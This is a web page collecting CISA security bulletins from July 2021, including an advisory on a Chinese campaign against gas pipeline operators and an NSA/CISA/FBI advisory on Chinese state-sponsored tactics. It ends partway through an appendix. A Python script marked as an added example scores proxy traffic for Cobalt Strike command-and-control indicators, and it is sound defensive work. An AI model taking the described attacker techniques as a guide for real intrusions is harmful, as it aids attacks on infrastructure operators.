Security – News ENG

News, alerts and bulletins from Computer Emergency Response Teams, in English

CERT (US-CERT)
  • CISA Releases Security Advisory for Geutebruck Devices
    by CISA on 27 July 2021 at 4:05 pm

    Original release date: July 27, 2021

    CISA has released an Industrial Control Systems (ICS) advisory detailing multiple vulnerabilities in multiple Geutebruck G-CAM E2 series devices and Encoder G-Code versions. A remote attacker could exploit some of these vulnerabilities to take control of an affected system. CISA encourages users and administrators to review the ICS Advisory ICSA-21-208-03 Geutebruck G-Cam E2 and G-Code and apply the necessary updates and workarounds.

    This product is provided subject to this Notification and this Privacy & Use policy.

  • Apple Releases Security Updates
    by CISA on 27 July 2021 at 11:05 am

    Original release date: July 27, 2021

    Apple has released security updates to address a vulnerability in multiple products. An attacker could exploit this vulnerability to take control of an affected device. CISA encourages users and administrators to review the security update page for the following products and apply the necessary updates:
      • MacOS Big Sur 11.5.1
      • iOS 14.7.1 and iPadOS 14.7.1

  • Microsoft Releases Guidance for Mitigating PetitPotam NTLM Relay Attacks
    by CISA on 27 July 2021 at 11:03 am

    Original release date: July 27, 2021

    On July 23, Microsoft released KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS) to address an NTLM relay attack named PetitPotam. CISA encourages users and administrators to review KB5005413 and apply the necessary mitigations.

  • Cisco Releases Security Updates
    by CISA on 22 July 2021 at 2:01 pm

    Original release date: July 22, 2021

    Cisco has released security updates to address multiple vulnerabilities in Intersight Virtual Appliance. An attacker could exploit these vulnerabilities to take control of an affected system. For updates addressing lower severity vulnerabilities, see the Cisco Security Advisories page. CISA encourages users and administrators to review Cisco Advisory cisco-sa-ucsi2-iptaclbp-L8Dzs8m8 and apply the necessary updates.

  • Drupal Releases Security Updates
    by CISA on 22 July 2021 at 2:00 pm

    Original release date: July 22, 2021

    Drupal has released security updates to address a critical third-party-library vulnerability that could affect Drupal 7, 8.9, 9.1, and 9.2. An attacker could exploit this vulnerability to take control of an affected system. CISA encourages users and administrators to review the Drupal security advisory and apply the necessary updates.

  • 2021 CWE Top 25 Most Dangerous Software Weaknesses
    by CISA on 21 July 2021 at 5:07 pm

    Original release date: July 21, 2021

    The Homeland Security Systems Engineering and Development Institute, sponsored by the Department of Homeland Security and operated by MITRE, has released the 2021 Common Weakness Enumeration (CWE) Top 25 Most Dangerous Software Weaknesses list. The Top 25 uses data from the National Vulnerability Database (NVD) to compile the most frequent and critical errors that can lead to serious vulnerabilities in software. An attacker can often exploit these vulnerabilities to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition. CISA encourages users and administrators to review the Top 25 list and evaluate recommended mitigations to determine those most suitable to adopt.

  • Malware Targeting Pulse Secure Devices
    by CISA on 21 July 2021 at 3:00 pm

    Original release date: July 21, 2021

    As part of CISA’s ongoing response to Pulse Secure compromises, CISA has analyzed 13 malware samples related to exploited Pulse Secure devices. CISA encourages users and administrators to review the following 13 malware analysis reports (MARs) for threat actor techniques, tactics, and procedures (TTPs) and indicators of compromise (IOCs) and to review CISA’s Alert Exploitation of Pulse Connect Secure Vulnerabilities for more information.

    MARs:
      • MAR-10333209-1.v1: Pulse Connect Secure
      • MAR-10333243-1.v1: Pulse Connect Secure
      • MAR-10334057-1.v1: Pulse Connect Secure
      • MAR-10334057-2.v1: Pulse Connect Secure
      • MAR-10334587-1.v1: Pulse Connect Secure
      • MAR-10334587-2.v1: Pulse Connect Secure
      • MAR-10335467-1.v1: Pulse Connect Secure
      • MAR-10336161-1.v1: Pulse Connect Secure
      • MAR-10336935-1.v1: Pulse Connect Secure
      • MAR-10337580-1.v1: Pulse Connect Secure
      • MAR-10337580-2.v1: Pulse Connect Secure
      • MAR-10338401-1.v1: Pulse Connect Secure
      • MAR-10338868-1.v1: Pulse Connect Secure

  • Adobe Releases Security Updates for Multiple Products
    by CISA on 21 July 2021 at 10:39 am

    Original release date: July 21, 2021

    Adobe has released security updates to address vulnerabilities in multiple Adobe products. An attacker could exploit some of these vulnerabilities to take control of an affected system. CISA encourages users and administrators to review the following Adobe Security Bulletins and apply the necessary updates:
      • APSB21-63 Photoshop
      • APSB21-62 Audition
      • APSB21-59 Character Animator
      • APSB21-58 Prelude
      • APSB21-56 Premiere Pro
      • APSB21-54 After Effects
      • APSB21-43 Media Encoder

  • Apple Releases Security Updates
    by CISA on 21 July 2021 at 10:37 am

    Original release date: July 21, 2021

    Apple has released security updates to address vulnerabilities in multiple products. An attacker could exploit some of these vulnerabilities to take control of an affected device. CISA encourages users and administrators to review the Apple security pages for the following products and apply the necessary updates:
      • MacOS Big Sur 11.5
      • Security Update 2021-004 Catalina
      • Security Update 2021-005 Mojave
      • iPadOS 14.7

  • Google Releases Security Updates for Chrome
    by CISA on 21 July 2021 at 10:35 am

    Original release date: July 21, 2021

    Google has released Chrome version 92.0.4515.107 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system. CISA encourages users and administrators to review the Chrome Release Note and apply the necessary updates.

  • AA21-201A: Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013
    by CISA on 20 July 2021 at 1:00 pm

    Original release date: July 20, 2021 | Last revised: July 21, 2021

    Summary

    This Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, Version 9. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques.

    Note: CISA released technical information, including indicators of compromise (IOCs), provided in this advisory in 2012 to affected organizations and stakeholders.

    This Joint Cybersecurity Advisory—coauthored by the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI)—provides information on a spearphishing and intrusion campaign conducted by state-sponsored Chinese actors that occurred from December 2011 to 2013, targeting U.S. oil and natural gas (ONG) pipeline companies. CISA and the FBI provided incident response and remediation support to a number of victims of this activity. Overall, the U.S. Government identified and tracked 23 U.S. natural gas pipeline operators targeted from 2011 to 2013 in this spearphishing and intrusion campaign. Of the known targeted entities, 13 were confirmed compromises, 3 were near misses, and 7 had an unknown depth of intrusion.

    The U.S. Government has attributed this activity to Chinese state-sponsored actors. CISA and the FBI assess that these actors were specifically targeting U.S. pipeline infrastructure for the purpose of holding U.S. pipeline infrastructure at risk. Additionally, CISA and the FBI assess that this activity was ultimately intended to help China develop cyberattack capabilities against U.S. pipelines to physically damage pipelines or disrupt pipeline operations.

    This advisory provides information on this campaign, including tactics, techniques, and procedures (TTPs) and IOCs. The TTPs remain relevant to help network defenders protect against intrusions. The IOCs are provided for historical awareness.
    CISA and the FBI urge owners and operators of Energy Sector and other critical infrastructure (CI) networks to adopt a heightened state of awareness and implement the recommendations listed in the Mitigations section of this advisory, which include implementing network segmentation between IT and industrial control system (ICS)/operational technology (OT) networks. These mitigations will improve a CI entity’s defensive cyber posture and functional resilience by reducing the risk of compromise or severe operational degradation if the system is compromised by malicious cyber actors, including but not limited to actors associated with the campaign described in this advisory. For more information on Chinese malicious cyber activity, see us-cert.cisa.gov/china.

    Technical Details

    In April 2012, CISA received reports about targeted attacks directed at multiple ONG pipeline sites; CISA (via a predecessor organization) and FBI provided incident response and remediation support to a number of victims from 2012 to 2013. CISA and FBI’s analysis of the malware and threat actor techniques identified that this activity was related to a spearphishing campaign. The U.S. Government identified and tracked 23 U.S. natural gas pipeline operators targeted in this campaign. Of the 23 known targeted entities, 13 were confirmed compromises, 3 were near misses, and 7 had an unknown depth of intrusion.

    Threat Actor Activity

    The spearphishing activity appears to have started in late December 2011. From December 9, 2011, through at least February 29, 2012, ONG organizations received spearphishing emails [T1566.002] specifically targeting their employees. The emails were constructed with a high level of sophistication to convince employees to view malicious files [T1204.002]. Note: see the appendix for a table of the MITRE ATT&CK tactics and techniques observed in this campaign.

    In addition to spearphishing, CISA and the FBI were made aware of social engineering attempts by malicious actors believed to be associated with this campaign. The apparent goal was to gain sensitive information from asset owners [T1598]. One asset owner reported that individuals in their network engineering department, including managers, received multiple phone calls requesting information about their recent network security practices. Other employees in other departments were not targeted. The asset owner also reported that these calls began immediately after they had identified and removed the malicious intruder from their network and performed a system-wide credential reset. The caller identified himself as an employee of a large computer security firm performing a national survey about network cybersecurity practices. He inquired about the organization’s policy and practices for firewall use and settings, types of software used to protect their network, and the use and type of intrusion detection and/or prevention systems. The caller was blocking his caller ID, and when the targeted organization tried to return the call, they reached a number that was not in service.

    During the investigation of these compromises, CISA and FBI personnel discovered that Chinese state-sponsored actors specifically collected [TA0009] and exfiltrated [TA0010] ICS-related information. The Chinese state-sponsored actors searched document repositories [T1213] for the following data types:
      • Document searches: “SCAD*”
      • Personnel lists
      • Usernames/passwords
      • Dial-up access information
      • System manuals

    Based on incident data, CISA and FBI assessed that Chinese state-sponsored actors also compromised various authorized remote access channels, including systems designed to transfer data and/or allow access between corporate and ICS networks. Though designed for legitimate business purposes, these systems have the potential to be manipulated by malicious cyber actors if unmitigated. With this access, the Chinese state-sponsored actors could have impersonated legitimate system operators to conduct unauthorized operations. According to the evidence obtained by CISA and FBI, the Chinese state-sponsored actors made no attempts to modify the pipeline operations of systems they accessed. Note: there was a significant number of cases where log data was not available, and the depth of intrusion and persistent impacts were unable to be determined; at least 8 of 23 cases (35 percent) identified in the campaign were assessed as having an unknown depth of intrusion due to the lack of log data.

    CISA and FBI assess that during these intrusions, China was successful in accessing the supervisory control and data acquisition (SCADA) networks at several U.S. natural gas pipeline companies. Chinese actors also gained information specific to dial-up access, including phone numbers, usernames, and passwords [T1120]. Dial-up modems continue to be prevalent in the Energy Sector, providing direct access into the ICS environment with little or no security and no monitoring, which makes them an optimal vector for hold-at-risk operations. The exfiltrated data provided the capabilities for the Chinese cyber actors to access ONG operational systems at a level where they could potentially conduct unauthorized operations.

    Exfiltrated Information and Assessed Motives

    The Chinese actors specifically targeted information that pertained to access of ICSs. Searches were made for terms involving “SCAD*,” and the actors exfiltrated documents, including personnel lists, usernames and passwords, dial-up access information, remote terminal unit (RTU) sites, and systems manuals. The Chinese actors also exfiltrated information pertaining to ICS permission groups and compromised jump points between corporate and ICS networks. The totality of this information would allow the actors to access ICS networks via multiple channels and would provide sufficient access to allow them to remotely perform unauthorized operations on the pipeline with physical consequences.

    CISA and FBI assess that these intrusions were likely intended to gain strategic access to the ICS networks for future operations rather than for intellectual property theft. This assessment was based on the content of the data that was being exfiltrated and the TTPs used to gain that access. One victim organization set up a honeypot that contained decoy documents with content that appeared to be SCADA-related data and sensitive organizational information. According to this organization, the SCADA-related decoy content was exfiltrated within 15 minutes of the time it was made available in the honeypot. Other sensitive decoy information, including financial and business-related information, was ignored. CISA and FBI assess that this activity was ultimately intended to help China develop cyberattack capabilities against U.S. pipelines to physically damage pipelines or disrupt pipeline operations.

    Indicators of Compromise

    Table 1 lists indicators related to this spearphishing and intrusion campaign as of May 7, 2012, which are provided in this alert for historical completeness.
    Table 1: IOCs from Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013
    Mitigations

    CISA and the FBI urge Energy Sector and other CI owners and operators to apply the following mitigations to implement a layered, defense-in-depth cyber posture. By implementing a layered approach, administrators will enhance the defensive cyber posture of their OT/ICS networks, reducing the risk of compromise or severe operational degradation if their system is compromised by malicious cyber actors.

    Harden the IT/corporate network to reduce the risk of initial compromise.
      • Update all software, including operating systems, applications, and firmware, in a timely manner. Consider using a centralized patch management system.
      • Replace all end-of-life software and hardware devices.
      • Restrict and manage remote access software. Remote access tools are a common method for threat actors to gain initial access and persistence on target networks.
          • Manage and restrict users and groups who are permitted to access remote capabilities. Permissions should be limited to users that require the capability to complete their duties.
          • Require multi-factor authentication (MFA) for remote access.
          • Limit access to resources over networks, especially by restricting Remote Desktop Protocol (RDP). If RDP is operationally necessary, restrict the originating sources and require MFA.
      • Enable strong spam filters to prevent phishing emails from reaching end users.
      • Implement unauthorized execution prevention by:
          • Disabling macro scripts from Microsoft Office files transmitted via email.
          • Implementing application allowlisting, which only allows systems to execute programs known and permitted by security policy.
      • Implement software restriction policies (SRPs) or other controls to prevent programs from executing from common malware locations, such as temporary folders supporting popular internet browsers.
      • Filter network traffic to prohibit ingress and egress communications with known malicious IP addresses.
      • Prevent users from accessing malicious websites by implementing URL blocklists and/or allow lists.
      • Set antivirus/antimalware programs to regularly scan IT network assets using up-to-date signatures.

    Implement and ensure robust network segmentation between IT and ICS networks to limit the ability of cyber threat actors to move laterally to ICS networks if the IT network is compromised.
      • Implement a network topology for ICS that has multiple layers, with the most critical communications occurring in the most secure and reliable layer. For more information refer to National Institute of Standards and Technology (NIST) Special Publication 800-82: Guide to ICS Security.
      • Use one-way communication diodes to prevent external access, whenever possible.
      • Set up demilitarized zones (DMZs) to create a physical and logical subnetwork that acts as an intermediary for connected security devices to avoid exposure.
      • Employ reliable network security protocols and services where feasible.
      • Consider using virtual local area networks (VLANs) for additional network segmentation, for example, by placing all printers in separate, dedicated VLANs and restricting users’ direct printer access.

    Implement perimeter security between network segments to limit the ability of cyber threat actors to move laterally.
      • Control traffic between network segments by using firewalls, intrusion detection systems (IDSs), and filter routers and switches.
      • Implement network monitoring at key chokepoints—including egress points to the internet, between network segments, core switch locations—and at key assets or services (e.g., remote access services).
      • Configure an IDS to create alarms for any ICS traffic outside normal operations (after establishing a baseline of normal operations and network traffic).
      • Configure security incident and event monitoring (SIEM) to monitor, analyze, and correlate event logs from across the ICS network to identify intrusion attempts.

    Implement the following additional ICS environment best practices:
      • Update all software. Use a risk-based assessment strategy to determine which ICS network assets and zones should participate in the patch management program. Test all patches in off-line test environments before implementation.
      • Implement application allowlisting on human machine interfaces.
      • Harden field devices, including tablets and smartphones.
      • Replace all end-of-life software and hardware devices.
      • Disable unused ports and services on ICS devices (after testing to ensure this will not affect ICS operation).
      • Restrict and manage remote access software. Require MFA for remote access to ICS networks.
      • Configure encryption and security for ICS protocols.
      • Use a risk-based asset inventory strategy to determine how OT network assets are identified and evaluated for the presence of malware.
      • Do not allow vendors to connect their devices to the ICS network. Use of a compromised device could introduce malware.
      • Maintain an ICS asset inventory of all hardware, software, and supporting infrastructure technologies.
      • Ensure robust physical security is in place to prevent unauthorized personnel from accessing controlled spaces that house ICS equipment.
      • Regularly test manual controls so that critical functions can be kept running if ICS/OT networks need to be taken offline.
      • Manage the supply chain by adjusting the ICS procurement process to weigh cybersecurity heavily as part of the scoring and evaluation methodology. Additionally, establish contractual agreements for all outsourced services that ensure proper incident handling and reporting, security of interconnections, and remote access specifications and processes.

    Implement the following additional best practices:
      • Implement IP geo-blocking, as appropriate.
      • Implement regular, frequent data backup procedures on both the IT and ICS networks. Data backup procedures should address the following best practices:
          • Ensure backups are regularly tested.
          • Store backups separately, i.e., backups should be isolated from network connections that could enable spread of malware or lateral movement.
          • Maintain regularly updated “gold images” of critical systems in the event they need to be rebuilt.
          • Retain backup hardware to rebuild systems in the event rebuilding the primary system is not preferred.
      • Implement a user training program to train employees to recognize spearphishing attempts, discourage users from visiting malicious websites or opening malicious attachments, and reinforce appropriate user response to spearphishing emails.

    APPENDIX: Tactics and Techniques

    Table 2 provides a summary of the MITRE ATT&CK tactics and techniques observed in this campaign.

    Table 2: Observed MITRE ATT&CK tactics and techniques
      Tactic                      | Technique
      Reconnaissance [TA0043]     | Phishing for Information [T1598]
      Initial Access [TA0001]     | Phishing: Spearphishing Link [T1566.002]
      Execution [TA0002]          | User Execution: Malicious File [T1204.002]
      Discovery [TA0007]          | Peripheral Device Discovery [T1120]
      Collection [TA0009]         | Information from Document Repositories [T1213]
      Exfiltration [TA0010]       |

    Revisions
      • Initial Version: July 20, 2021
      • July 20, 2021: Corrected "unknown depth of intrusion" in Technical Details from 8 to 7.
      • July 20, 2021: Removed "Office Viewer" recommendation since it's deprecated.

  • AA21-200B: Chinese State-Sponsored Cyber Operations: Observed TTPs
    by CISA on 19 July 2021 at 11:00 am

    Original release date: July 19, 2021SummaryThis advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, Version 9, and MITRE D3FEND™ framework, version 0.9.2-BETA-3. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques and the D3FEND framework for referenced defensive tactics and techniques. The National Security Agency, Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI) assess that People’s Republic of China state-sponsored malicious cyber activity is a major threat to U.S. and Allied cyberspace assets. Chinese state-sponsored cyber actors aggressively target U.S. and allied political, economic, military, educational, and critical infrastructure (CI) personnel and organizations to steal sensitive data, critical and emerging key technologies, intellectual property, and personally identifiable information (PII). Some target sectors include managed service providers, semiconductor companies, the Defense Industrial Base (DIB), universities, and medical institutions. These cyber operations support China’s long-term economic and military development objectives. This Joint Cybersecurity Advisory (CSA) provides information on tactics, techniques, and procedures (TTPs) used by Chinese state-sponsored cyber actors. This advisory builds on previous NSA, CISA, and FBI reporting to inform federal, state, local, tribal, and territorial (SLTT) government, CI, DIB, and private industry organizations about notable trends and persistent TTPs through collaborative, proactive, and retrospective analysis. To increase the defensive posture of their critical networks and reduce the risk of Chinese malicious cyber activity, NSA, CISA, and FBI urge government, CI, DIB, and private industry organizations to apply the recommendations listed in the Mitigations section of this advisory and in Appendix A: Chinese State-sponsored Cyber Actors' Observed Procedures. 
Note: NSA, CISA, and FBI encourage organization leaders to review CISA Joint Insights: Chinese Malicious Cyber Activity: Threat Overview for Leaders for information on this threat to their organization. Click here for a PDF version of this report. Technical DetailsTrends in Chinese State-Sponsored Cyber Operations NSA, CISA, and FBI have observed increasingly sophisticated Chinese state-sponsored cyber activity targeting U.S. political, economic, military, educational, and CI personnel and organizations. NSA, CISA, and FBI have identified the following trends in Chinese state-sponsored malicious cyber operations through proactive and retrospective analysis: Acquisition of Infrastructure and Capabilities. Chinese state-sponsored cyber actors remain agile and cognizant of the information security community’s practices. These actors take effort to mask their activities by using a revolving series of virtual private servers (VPSs) and common open-source or commercial penetration tools. Exploitation of Public Vulnerabilities. Chinese state-sponsored cyber actors consistently scan target networks for critical and high vulnerabilities within days of the vulnerability’s public disclosure. In many cases, these cyber actors seek to exploit vulnerabilities in major applications, such as Pulse Secure, Apache, F5 Big-IP, and Microsoft products. For information on Common Vulnerabilities and Exposures (CVE) known to be exploited by malicious Chinese state-sponsored cyber actors, see: CISA-FBI Joint CSA AA20-133A: Top 10 Routinely Exploited Vulnerabilities, CISA Activity Alert: AA20-275A: Potential for China Cyber Response to Heightened U.S.-China Tensions, and NSA CSA U/OO/179811-20: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities. Encrypted Multi-Hop Proxies. Chinese state-sponsored cyber actors have been routinely observed using a VPS as an encrypted proxy. 
The cyber actors use the VPS as well as small office and home office (SOHO) devices as operational nodes to evade detection. Observed Tactics and Techniques Chinese state-sponsored cyber actors use a full array of tactics and techniques to exploit computer networks of interest worldwide and to acquire sensitive intellectual property, economic, political, and military information. Appendix B: MITRE ATT&CK Framework lists the tactics and techniques used by Chinese state-sponsored cyber actors. A downloadable JSON file is also available on the NSA Cybersecurity GitHub page. Refer to Appendix A: Chinese State-Sponsored Cyber Actors’ Observed Procedures for information on procedures affiliated with these tactics and techniques as well as applicable mitigations. Figure 1: Example of tactics and techniques used in various cyber operations.   Mitigations NSA, CISA, and FBI urge federal and SLTT government, CI, DIB, and private industry organizations to apply the following recommendations as well as the detection and mitigation recommendations in Appendix A, which are tailored to observed tactics and techniques: Patch systems and equipment promptly and diligently. Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally facing equipment and CVEs known to be exploited by Chinese state-sponsored cyber actors. Consider implementing a patch management program that enables a timely and thorough patching cycle.Note: for more information on CVEs routinely exploited by Chinese state-sponsored cyber actors refer to the resources listed in the Trends in Chinese State-Sponsored Cyber Operations section. Enhance monitoring of network traffic, email, and endpoint systems. Review network signatures and indicators for focused activities, monitor for new phishing themes, and adjust email rules accordingly. Follow the best practices of restricting attachments via email and blocking URLs and domains based upon reputation. 
• Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse.
• Monitor common ports and protocols for command and control (C2) activity. SSL/TLS inspection can be used to see the contents of encrypted sessions to look for network-based indicators of malware communication protocols.
• Implement and enhance network and endpoint event analysis and detection capabilities to identify initial infections, compromised credentials, and the manipulation of endpoint processes and files.
• Use protection capabilities to stop malicious activity. Implement anti-virus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use a network intrusion detection and prevention system to identify and prevent commonly employed adversarial malware and limit nefarious data transfers. Use a domain reputation service to detect suspicious or malicious domains.
• Use strong credentials for service accounts and multi-factor authentication (MFA) for remote access to mitigate an adversary's ability to leverage stolen credentials, but be aware of MFA interception techniques for some MFA implementations.

Resources

Refer to us-cert.cisa.gov/china, https://www.ic3.gov/Home/IndustryAlerts, and https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/ for previous reporting on Chinese state-sponsored malicious cyber activity.

Disclaimer of Endorsement

The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.
Purpose

This document was developed by NSA, CISA, and FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.

This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see http://www.us-cert.gov/tlp/.

Trademark Recognition

• MITRE and ATT&CK are registered trademarks of The MITRE Corporation.
• D3FEND is a trademark of The MITRE Corporation.
• Microsoft, Microsoft Exchange, Office 365, Microsoft Office, OneDrive, Outlook, OWA, PowerShell, Windows Defender, and Windows are registered trademarks of Microsoft Corporation.
• Pulse Secure is a registered trademark of Pulse Secure, LLC.
• Apache is a registered trademark of Apache Software Foundation.
• F5 and BIG-IP are registered trademarks of F5 Networks.
• Cobalt Strike is a registered trademark of Strategic Cyber LLC.
• GitHub is a registered trademark of GitHub, Inc.
• JavaScript is a registered trademark of Oracle Corporation.
• Python is a registered trademark of Python Software Foundation.
• Unix is a registered trademark of The Open Group.
• Linux is a registered trademark of Linus Torvalds.
• Dropbox is a registered trademark of Dropbox, Inc.

APPENDIX A: Chinese State-Sponsored Cyber Actors’ Observed Procedures

Note: D3FEND techniques are based on the Threat Actor Procedure(s) and may not match automated mappings to ATT&CK techniques and sub-techniques.
Tactics: Reconnaissance [TA0043]

Table 1: Chinese state-sponsored cyber actors’ Reconnaissance TTPs with detection and mitigation recommendations (columns: Threat Actor Technique / Sub-Techniques; Threat Actor Procedure(s); Detection and Mitigation Recommendations; Defensive Tactics and Techniques)

Threat Actor Technique / Sub-Techniques: Active Scanning [T1595]
Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been assessed to perform reconnaissance on Microsoft® 365 (M365), formerly Office® 365, resources with the intent of further gaining information about the networks. These scans can be automated, through Python® scripts, to locate certain files, paths, or vulnerabilities. The cyber actors can gain valuable information on the victim network, such as the allocated resources, an organization’s fully qualified domain name, IP address space, and open ports to target or exploit.
Detection and Mitigation Recommendations:
• Minimize the amount and sensitivity of data available to external parties, for example: scrub user email addresses and contact lists from public websites, which can be used for social engineering; share only necessary data and information with third parties; and monitor and limit third-party access to the network.
• Active scanning from cyber actors may be identified by monitoring network traffic for sources associated with botnets, adversaries, and known bad IPs based on threat intelligence.
Defensive Tactics and Techniques:
• Detect: Network Traffic Analysis / Connection Attempt Analysis [D3-CAA]
• Isolate: Network Isolation / Inbound Traffic Filtering [D3-ITF]

Also listed under Reconnaissance: Gather Victim Network Information [T1590]

Tactics: Resource Development [TA0042]

Table II: Chinese state-sponsored cyber actors’ Resource Development TTPs with detection and mitigation recommendations (columns: Threat Actor Technique / Sub-Techniques; Threat Actor Procedure(s); Detection and Mitigation Recommendations; Defensive Tactics and Techniques)

Threat Actor Technique / Sub-Techniques: Acquire Infrastructure [T1583]
Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been observed using VPSs from cloud service providers that are physically distributed around the world to host malware and function as C2 nodes.
Detection and Mitigation Recommendations: Adversary activities occurring outside the organization’s boundary of control and view make mitigation difficult. Organizations can monitor for unexpected network traffic and data flows to and from VPSs and correlate other suspicious activity that may indicate an active threat.
Defensive Tactics and Techniques: N/A

Threat Actor Technique / Sub-Techniques: Stage Capabilities [T1608]; Obtain Capabilities [T1588]: Tools [T1588.002]
Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been observed using Cobalt Strike® and tools from GitHub® on victim networks.
Detection and Mitigation Recommendations: Organizations may be able to identify malicious use of Cobalt Strike by:
• Examining network traffic using Transport Layer Security (TLS) inspection to identify Cobalt Strike. Distinguish human-generated from machine-generated traffic; machine-generated traffic will be more uniformly distributed in time.
• Looking for the default Cobalt Strike TLS certificate.
• Looking at the user agent that generates the TLS traffic for discrepancies that may indicate faked and malicious traffic.
• Reviewing the traffic destination domain, which may be malicious and an indicator of compromise.
• Looking at the packet's HTTP Host header. If it does not match the destination domain, it may indicate a fake Cobalt Strike header and profile.
• Checking the Uniform Resource Identifier (URI) of the flow to see if it matches one associated with Cobalt Strike's malleable C2 language. If discovered, additional recovery and investigation will be required.
Defensive Tactics and Techniques: N/A

Tactics: Initial Access [TA0001]

Table III: Chinese state-sponsored cyber actors’ Initial Access TTPs with detection and mitigation recommendations (columns: Threat Actor Technique / Sub-Techniques; Threat Actor Procedure(s); Detection and Mitigation Recommendations; Defensive Tactics and Techniques)

Threat Actor Technique / Sub-Techniques: Drive-By Compromise [T1189]
Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been observed gaining access to victim networks through watering hole campaigns of typo-squatted domains.
Detection and Mitigation Recommendations:
• Ensure all browsers and plugins are kept up to date.
• Use modern browsers with security features turned on.
• Restrict the use of unneeded websites, block unneeded downloads/attachments, block unneeded JavaScript®, restrict browser extensions, etc.
• Use adblockers to help prevent malicious code served through advertisements from executing.
• Use script blocking extensions to help prevent the execution of unneeded JavaScript, which may be used during exploitation processes.
• Use browser sandboxes or remote virtual environments to mitigate browser exploitation.
• Use security applications that look for behavior used during exploitation, such as Windows Defender® Exploit Guard (WDEG).
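The Cobalt Strike traffic checks in Table II above (Host header versus destination domain, beacon regularity, user-agent discrepancies, and known certificate or URI indicators) can be scripted over the flow metadata a TLS-inspecting proxy produces. The following is an added example and is not part of the advisory; it runs over constructed flow records, and the certificate fingerprint and URI indicator sets are placeholders to be replaced with values from your own threat intelligence.

```python
import statistics
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Placeholder indicator sets (constructed for this example): replace with the
# certificate fingerprints and malleable-C2 URIs from your own threat intelligence.
KNOWN_BAD_CERT_SHA256 = {"PLACEHOLDER-DEFAULT-COBALT-STRIKE-CERT-SHA256"}
KNOWN_C2_URIS = {"/placeholder-malleable-c2-uri"}


@dataclass
class Flow:
    """One HTTPS request as seen by a TLS-inspecting proxy (constructed record format)."""
    ts: float           # request time, epoch seconds
    src: str            # internal client address
    dst_domain: str     # destination domain (SNI / resolved name)
    host_header: str    # HTTP Host header visible after TLS inspection
    uri: str
    user_agent: str
    cert_sha256: str    # SHA-256 of the server certificate


def host_header_mismatch(flow: Flow) -> bool:
    """A Host header that differs from the real destination suggests a faked C2 profile."""
    return flow.host_header.strip().lower() != flow.dst_domain.strip().lower()


def beacon_regularity(timestamps: List[float]) -> float:
    """Coefficient of variation of inter-request gaps: near 0 means machine-regular
    check-ins, which human browsing does not produce. Returns inf with too few samples."""
    if len(timestamps) < 3:
        return float("inf")
    ordered = sorted(timestamps)
    gaps = [later - earlier for earlier, later in zip(ordered, ordered[1:])]
    mean_gap = statistics.mean(gaps)
    if mean_gap <= 0:
        return float("inf")
    return statistics.pstdev(gaps) / mean_gap


def score_flows(flows: List[Flow], regularity_threshold: float = 0.1) -> Dict[Tuple[str, str], List[str]]:
    """Group flows by (client, destination) and return the reasons each pair looks like C2."""
    by_pair: Dict[Tuple[str, str], List[Flow]] = defaultdict(list)
    for flow in flows:
        by_pair[(flow.src, flow.dst_domain)].append(flow)

    findings: Dict[Tuple[str, str], List[str]] = {}
    for pair, group in by_pair.items():
        reasons = []
        if any(host_header_mismatch(f) for f in group):
            reasons.append("host-header-mismatch")
        if any(f.cert_sha256 in KNOWN_BAD_CERT_SHA256 for f in group):
            reasons.append("known-bad-certificate")
        if any(f.uri in KNOWN_C2_URIS for f in group):
            reasons.append("known-c2-uri")
        if len({f.user_agent for f in group}) > 1:
            reasons.append("user-agent-churn")
        cv = beacon_regularity([f.ts for f in group])
        if cv < regularity_threshold:
            reasons.append(f"beacon-regularity cv={cv:.2f}")
        if reasons:
            findings[pair] = reasons
    return findings


# Constructed sample: one client checking in every 60 s with a Host header that does not
# match the destination, and one client browsing an intranet site at irregular intervals.
SAMPLE_FLOWS = [
    Flow(1000.0 + 60 * i, "10.0.0.5", "cdn-update.example", "mail.corp.example",
         "/api/v1/status", "Mozilla/5.0", "aa" * 32)
    for i in range(6)
] + [
    Flow(t, "10.0.0.9", "intranet.example", "intranet.example", "/home", "Mozilla/5.0", "bb" * 32)
    for t in (2000.0, 2013.0, 2090.0, 2094.0)
]

if __name__ == "__main__":
    for (src, dst), reasons in score_flows(SAMPLE_FLOWS).items():
        print(f"{src} -> {dst}: {', '.join(reasons)}")
```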
Defensive Tactics and Techniques:
• Detect: Identifier Analysis / Homoglyph Detection [D3-HD]; URL Analysis [D3-UA]; File Analysis / Dynamic Analysis [D3-DA]
• Isolate: Execution Isolation / Hardware-based Process Isolation [D3-HBPI]; Executable Allowlisting [D3-EAL]; Network Isolation / DNS Denylisting [D3-DNSDL]; Outbound Traffic Filtering [D3-OTF]

Threat Actor Technique / Sub-Techniques: Exploit Public-Facing Application [T1190]
